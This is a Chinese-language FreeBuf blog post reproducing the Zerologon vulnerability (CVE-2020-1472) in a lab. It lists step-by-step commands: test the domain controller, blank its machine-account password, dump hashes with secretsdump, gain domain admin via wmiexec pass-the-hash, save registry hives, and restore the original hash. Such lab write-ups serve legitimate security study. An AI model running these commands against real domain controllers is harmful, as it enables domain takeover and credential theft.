freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2020-1472 漏洞复现
F_ 2021-03-11 15:40:24 336560

本文仅做漏洞复现记录与实现,利用流程如下:

1.复现环境

win7跳板机IP:192.168.52.143

win2008域控IP: 192.168.52.138

2. 利用过程

检测域控是否存在漏洞

python zerologon_tester.py owa 192.168.52.138

1615446494_6049c1de8205417ef02f7.png!small

使用漏洞利用工具将域控机器账户密码置空,该步骤可能会导致域控脱域,需要及时恢复hash

python set_empty_pw.py owa 192.168.52.138

1615447795_6049c6f32c892fe657343.png!small

之后使用空密码将域控的hash下载

python secretsdump.py god.org/"owa$"@192.168.52.138 -no-pass

1615447861_6049c73575229a249e981.png!small

之后使用hash通过wmiexec.py获取域管权限

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:81be2f80d568100549beac645d6a7141 administrator@192.168.52.138

1615448280_6049c8d81a99d6c9c610a.png!small

执行以下命令,获取目标原始hash

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

1615448280_6049c8d851f9d9dda29a3.png!small

将其下载下来

get system.save

get sam.save

get security.save

之后将获取其置空前hash

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

1615448295_6049c8e7cc2d1cb98defe.png!small

恢复域控hash

python reinstall_original_pw.py owa 192.168.52.138 75c1f14a63ee00aef8a5200eeff2bf88

1615448280_6049c8d851277d69a2943.png!small

使用空密码验证连接

1615448280_6049c8d84518f19a2e58b.png!small

域控hash已经恢复

# web安全
本文为 F_ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
F_ LV.5
这家伙太懒了,还未填写个人描述!
  • 28 文章数
  • 11 关注者
使用AnyDesk静默安装控制主机
2022-06-08
没什么用处的上线方式增加了
2021-05-16
基础免杀-特征码定位
2021-05-06